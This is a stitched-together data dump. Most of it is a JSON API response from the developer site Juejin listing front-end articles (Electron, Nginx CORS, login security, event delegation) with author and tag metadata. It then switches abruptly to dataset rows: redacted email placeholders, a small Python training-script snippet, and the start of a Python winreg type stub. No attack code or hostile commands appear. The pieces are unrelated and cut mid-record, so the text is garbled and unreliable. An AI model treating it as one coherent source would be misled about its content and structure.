"https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}], "user_interact": {"id": 6997229191468941348, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}, {"article_id": "6844904002220638215", "article_info": {"article_id": "6844904002220638215", "user_id": "3650034336539454", "category_id": "6809637767543259144", 
"tag_ids": [6809640563810238478, 6809640407484334093], "visible_level": 0, "link_url": "https://juejin.im/post/6844904002220638215", "cover_image": "", "is_gfw": 0, "title": "Electron IM 应用开发实践", "brief_content": "上一节Electron 从零到一 介绍了 electron 的基础使用,介绍的比较简单,照着文章一步步基本可以做出一个简单的原型项目啦。 这篇文章介绍一下 electron IM 应用开发中要考虑的一些问题。 对聊天软件而言,消息的保密性就比较重要了,谁也不希望自己的聊天内容泄…", "is_english": 0, "is_original": 1, "user_index": 12.651886962255, "original_type": 0, "original_author": "", "content": "", "ctime": "1574321667", "mtime": "1598535324", "rtime": "1574340557", "draft_id": "6845076541139845128", "view_count": 11058, "collect_count": 277, "digg_count": 275, "comment_count": 29, "hot_index": 856, "is_hot": 0, "rank_index": 0.00299187, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3650034336539454", "user_name": "蘑菇街前端团队", "company": "蘑菇街", "job_title": "make fashion accessible to everyone!", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/10/21/16ded934b8a4f707~tplv-t2oaga2asx-image.image", "level": 3, "description": "蘑菇街前端团队", "followee_count": 5, "follower_count": 1483, "post_article_count": 7, "digg_article_count": 0, "got_digg_count": 1533, "got_view_count": 64145, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 2174, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546640, "tag_id": "6809640563810238478", "tag_name": "Electron", "color": "#46848F", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/f4280ffbc30674f98ea5.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1442255764, "mtime": 1631692684, "id_type": 9, "tag_alias": "", "post_article_count": 992, "concern_user_count": 15343}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}], "user_interact": {"id": 6844904002220638215, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}, {"article_id": "6844903503807119368", "article_info": {"article_id": "6844903503807119368", "user_id": "1415826675874216", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640404791590919, 6809640612774543374, 6809640398105870343], "visible_level": 0, "link_url": "https://juejin.im/post/6844903503807119368", "cover_image": "", "is_gfw": 0, "title": "关于IT培训机构的个人看法", "brief_content": 
"缘分与巧合,最近接触比较多的培训机构出来的人,以及看过关于培训机构的文章和问答。虽然没在培训机构上过课,但是接触过很多培训机构出来的人,也看过一些培训机构的课程。关于培训机构,我也有自己的看法。经历了这些,我写了这篇文章,不吹不黑的写下我对培训机构的个人见解。这篇文章可能会有些…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1508114294", "mtime": "1598436324", "rtime": "1508114294", "draft_id": "6845075309721550862", "view_count": 30931, "collect_count": 134, "digg_count": 429, "comment_count": 381, "hot_index": 2356, "is_hot": 0, "rank_index": 0.00299115, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1415826675874216", "user_name": "守候i", "company": "公众号:守候书阁", "job_title": "web前端开发", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2017/7/18/64d82b70650d11ed806f611d929c7b1e~tplv-t2oaga2asx-image.image", "level": 6, "description": "", "followee_count": 38, "follower_count": 12593, "post_article_count": 48, "digg_article_count": 40, "got_digg_count": 26111, "got_view_count": 703848, "post_shortmsg_count": 6, "digg_shortmsg_count": 3, "isfollowed": false, "favorable_author": 1, "power": 33083, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2546524, "tag_id": "6809640404791590919", "tag_name": "面试", "color": "#545454", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/85dd1ce8008458ac220c.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435971430, "mtime": 1631693159, "id_type": 9, "tag_alias": "", "post_article_count": 15729, "concern_user_count": 349602}, {"id": 2546675, "tag_id": "6809640612774543374", "tag_name": "招聘", "color": "#4e90f0", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/d60ba24d3d2b7cb7.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1453196759, "mtime": 1631594061, "id_type": 9, "tag_alias": "", "post_article_count": 1909, "concern_user_count": 74014}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631693185, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398957}], "user_interact": {"id": 6844903503807119368, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": 
null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}, {"article_id": "6968998053130797086", "article_info": {"article_id": "6968998053130797086", "user_id": "2893570336630072", "category_id": "6809637767543259144", "tag_ids": [6809640398105870343, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "https://p6-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/b5af12b69b4d4894ac23ff085657eb1f~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "Cesium源码跟读之CesiumWidget的实现", "brief_content": "没错,我也来读源码了,因为上一篇文章中简单提到了一下Cesium的渲染机制,所以我索性一咬牙将这块的源码通读一遍,自己也能更深入的了解Cesium", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1622596303", "mtime": "1622623529", "rtime": "1622623529", "draft_id": "6968997161644064775", "view_count": 1006, "collect_count": 6, "digg_count": 29, "comment_count": 0, "hot_index": 79, "is_hot": 0, "rank_index": 0.00299077, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2893570336630072", "user_name": "moe_", "company": "OCDL", "job_title": "前端摸鱼带砖家", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/59c04d0ec17d810ab8e0ce8d44edfe8f~300x300.image", "level": 2, "description": "不喜欢别人的韵脚 丨\n技术交流➕微信:moe_wang333", "followee_count": 48, "follower_count": 173, "post_article_count": 15, "digg_article_count": 212, "got_digg_count": 277, "got_view_count": 23430, "post_shortmsg_count": 55, "digg_shortmsg_count": 147, "isfollowed": false, "favorable_author": 0, "power": 511, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631693185, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398957}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}], "user_interact": {"id": 6968998053130797086, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}, {"article_id": "6986452836129193991", "article_info": {"article_id": "6986452836129193991", "user_id": "3227821868602398", "category_id": "6809637767543259144", "tag_ids": [6809640361531539470, 
6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Sentry接入企业微信消息通知", "brief_content": "一、背景 公司客户端项目是基于Electron开发的,里面集成了一些第三方的插件和库,经常会遇到一些兼容性和性能问题,目前是通过用户反馈,运维去远程协助,处理不了的就会提bug给开发人员排查,部分问题", "is_english": 0, "is_original": 1, "user_index": 3.709511291351455, "original_type": 0, "original_author": "", "content": "", "ctime": "1626660413", "mtime": "1626765899", "rtime": "1626765899", "draft_id": "6985458673455726623", "view_count": 383, "collect_count": 3, "digg_count": 13, "comment_count": 0, "hot_index": 32, "is_hot": 0, "rank_index": 0.00298964, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3227821868602398", "user_name": "zhjgh", "company": "", "job_title": "前端", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/06fc7d6e3e59df02a4d6c26c3e7b1482~300x300.image", "level": 1, "description": "", "followee_count": 22, "follower_count": 2, "post_article_count": 3, "digg_article_count": 94, "got_digg_count": 20, "got_view_count": 1011, "post_shortmsg_count": 0, "digg_shortmsg_count": 1, "isfollowed": false, "favorable_author": 0, "power": 30, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546492, "tag_id": "6809640361531539470", "tag_name": "Node.js", "color": "#e81864", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/f16f548d25028a1fdd80.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234488, "mtime": 1631690352, "id_type": 9, "tag_alias": "", "post_article_count": 11514, "concern_user_count": 280711}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}], "user_interact": {"id": 6986452836129193991, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}, {"article_id": "6963097187744120862", "article_info": {"article_id": "6963097187744120862", "user_id": "4098589725834317", "category_id": "6809637767543259144", "tag_ids": [6809640361531539470, 6809640398105870343, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "https://p9-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/da995416188e48e8a62600e908aaebab~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "从一次重构组件代码来谈谈前端多语言最佳实践", "brief_content": "重构代码背景 我们的一些业务组件需要支持多语言,这些单独发包的组件翻译文案通常都维护在项目一些文件夹下,并且每个需要翻译的文案在代码中都需要手动用 intl.get(key)包裹来实现运行时翻译,开发", "is_english": 0, "is_original": 1, "user_index": 0, 
"original_type": 0, "original_author": "", "content": "", "ctime": "1621222479", "mtime": "1621230287", "rtime": "1621230287", "draft_id": "6963080937198485541", "view_count": 1484, "collect_count": 10, "digg_count": 19, "comment_count": 2, "hot_index": 95, "is_hot": 0, "rank_index": 0.00298724, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4098589725834317", "user_name": "字节前端", "company": "北京字节跳动网络技术有限公司", "job_title": "", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/3c4d172634bb28fa061a6ec7feae35ce~300x300.image", "level": 4, "description": "公众号:字节前端ByteFE", "followee_count": 5, "follower_count": 6445, "post_article_count": 136, "digg_article_count": 1, "got_digg_count": 6592, "got_view_count": 339831, "post_shortmsg_count": 3, "digg_shortmsg_count": 1, "isfollowed": false, "favorable_author": 1, "power": 9989, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 1, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546492, "tag_id": "6809640361531539470", "tag_name": "Node.js", "color": "#e81864", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/f16f548d25028a1fdd80.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234488, "mtime": 1631690352, "id_type": 9, "tag_alias": "", "post_article_count": 11514, "concern_user_count": 280711}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631693185, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398957}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}], "user_interact": {"id": 6963097187744120862, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": {"org_type": 1, "org_id": "6930802337313210381", "online_version_id": 6930890337229471751, "latest_version_id": 6930890337229471751, "power": 6386, "ctime": 1613706529, "mtime": 1631693120, "audit_status": 2, "status": 0, "org_version": {"version_id": "6930890337229471751", "icon": "https://p6-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/59fd4b984fc745de8cb38b345577ed31~tplv-k3u1fbpfcp-watermark.image", "background": "https://p1-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/41d1c0cd091e42b1b52de07f7fff87e4~tplv-k3u1fbpfcp-zoom-1.image", "name": "字节前端", "introduction": "字节前端,字节跳动官方前端技术分享账号。", "weibo_link": "", 
"github_link": "", "homepage_link": "", "ctime": 1613732604, "mtime": 1613732604, "org_id": "6930802337313210381", "brief_introduction": "字节前端的技术实践分享", "introduction_preview": "字节前端,字节跳动官方前端技术分享账号。"}, "follower_count": 5724, "article_view_count": 199708, "article_digg_count": 4389}, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}, {"article_id": "7001743805661577223", "article_info": {"article_id": "7001743805661577223", "user_id": "2788017219574584", "category_id": "6809637767543259144", "tag_ids": [6809640488954494983], "visible_level": 0, "link_url": "", "cover_image": "https://p1-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/c523ebecc128449f88aa50a3ef72404f~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "Nginx实战四 (CORS跨域)", "brief_content": "nginx 除了可以设置反向代理解决跨域,还可以设置 CORS 解决跨域; nginx 除了可以设置反向代理解决跨域,还可以设置 CORS 解决跨域", "is_english": 0, "is_original": 1, "user_index": 0.380182355385648, "original_type": 0, "original_author": "", "content": "", "ctime": "1630220681", "mtime": "1630290912", "rtime": "1630227589", "draft_id": "7001734832032055333", "view_count": 130, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 7, "is_hot": 0, "rank_index": 0.00298592, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2788017219574584", "user_name": "不加辣椒", "company": "", "job_title": "前端", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/90b59a1cd917e688e224cc555958fdb6~300x300.image", "level": 1, "description": "", "followee_count": 14, "follower_count": 0, "post_article_count": 9, "digg_article_count": 3, "got_digg_count": 5, "got_view_count": 758, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 12, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546585, "tag_id": "6809640488954494983", "tag_name": "Nginx", "color": "#009733", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/3cfd907394313acbedff.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1438735979, "mtime": 1631688005, "id_type": 9, "tag_alias": "", "post_article_count": 2924, "concern_user_count": 150836}], "user_interact": {"id": 7001743805661577223, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}, {"article_id": "6972602589850370084", "article_info": {"article_id": "6972602589850370084", "user_id": "2735240661967304", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/e432f8c130394fc2a6d3eae4c25f8bc0~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, 
"title": "你的登陆方式真的安全吗?", "brief_content": "前言 各位先思考几个问题: 你的web系统登陆真的安全吗? 用户真的愿意用大脑记住每个系统的账号密码吗? 我们怎么确保账号密码在传输过程中不会被窃取? 思考一下再去读下文... web传统登录方式 1", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1623437950", "mtime": "1623679848", "rtime": "1623476824", "draft_id": "6972509439924371464", "view_count": 907, "collect_count": 8, "digg_count": 23, "comment_count": 1, "hot_index": 69, "is_hot": 0, "rank_index": 0.00298501, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2735240661967304", "user_name": "贼烦字符串er", "company": "保密可以吗?", "job_title": "有理想的前端跑渣", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/38d959af19c5a88c9bb6b5a48667614f~300x300.image", "level": 2, "description": "啥也不会还懒得学的人生赢家", "followee_count": 23, "follower_count": 20, "post_article_count": 5, "digg_article_count": 38, "got_digg_count": 55, "got_view_count": 2150, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 76, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}], "user_interact": {"id": 6972602589850370084, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}, {"article_id": "7000293683836747790", "article_info": {"article_id": "7000293683836747790", "user_id": "1179138674920312", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640398105870343], "visible_level": 0, "link_url": "", "cover_image": "https://p9-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/16ad9e3b96c04defb974ffe59bce0339~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "js中的事件委托/代理", "brief_content": "小编今天在做项目的时候,在项目的注释中发现了关于事件委托的注释(PS:虽然下面代码写的不是事件委托的代码!)", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1629882927", "mtime": "1629955287", "rtime": "1629955287", "draft_id": "7000288125771579429", "view_count": 127, "collect_count": 0, "digg_count": 3, "comment_count": 0, "hot_index": 9, "is_hot": 0, "rank_index": 0.00298437, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1179138674920312", "user_name": "飞鹰3995", "company": "", "job_title": "前端开发", "avatar_large": 
"https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/b77f29c98cf72a2e8fbd019bbc62991f~300x300.image", "level": 1, "description": "", "followee_count": 1, "follower_count": 3, "post_article_count": 45, "digg_article_count": 1, "got_digg_count": 20, "got_view_count": 2430, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 44, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631693185, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398957}], "user_interact": {"id": 7000293683836747790, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}], "cursor": "eyJ2IjoiNzAwNzk5MTg0ODMwODMxMDAyNCIsImkiOjc4ODB9", "count": 34210, "has_more": true} | [
"[email protected]"
] | |
1778e80f2fab17a4495abc3b59d9289f191e26ed | bb71e927dc2429abf551b44874ee990cb3a93f7a | /python/python_tricks/train.py | b7b940b5716ec1c81a6ebdd74a7e822126801790 | [] | no_license | khuyentran1401/Data-science | c37021349bb407ed50d891dab780463e0b243de5 | be59f5959be9f5944e12260fbb4548c85ef6aabe | refs/heads/master | 2023-08-31T13:46:58.212459 | 2023-08-09T15:46:11 | 2023-08-09T15:46:11 | 280,508,180 | 3,809 | 943 | null | 2023-05-23T02:38:37 | 2020-07-17T19:25:27 | Jupyter Notebook | UTF-8 | Python | false | false | 281 | py | import sys
model_type = sys.argv[1]
model_version = sys.argv[2]
model_path = f'''model/model1/{model_type}/version_{model_version}'''
print('Loading model from', model_path, 'for training')
# On the terminal, run (the script takes two arguments,
# a model type and a version number):
# for version in 1 2 3 4
# do
#     python train.py <model_type> $version
# done
"[email protected]"
] | |
9593144727e4f55f8bc92271de4d519cd3632302 | 8e07b5b7a8dd38e0ef2c7ffc97d0392d886f32e6 | /venv/Lib/site-packages/mypy/typeshed/stdlib/3/winreg.pyi | 23482b55cac99932caabc054d47d219409f6ba40 | [] | no_license | RodrigoNeto/cursopythonyt | fc064a2e6106324e22a23c54bdb9c31040ac9eb6 | 279dad531e21a9c7121b73d84fcbdd714f435e7e | refs/heads/master | 2023-07-03T00:54:09.795054 | 2021-08-13T12:42:24 | 2021-08-13T12:42:24 | 395,646,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,827 | pyi | from types import TracebackType
from typing import Any, Optional, Tuple, Type, Union
_KeyType = Union[HKEYType, int]
def CloseKey(__hkey: _KeyType) -> None: ...
def ConnectRegistry(__computer_name: Optional[str], __key: _KeyType) -> HKEYType: ...
def CreateKey(__key: _KeyType, __sub_key: Optional[str]) -> HKEYType: ...
def CreateKeyEx(key: _KeyType, sub_key: Optional[str], reserved: int = ..., access: int = ...) -> HKEYType: ...
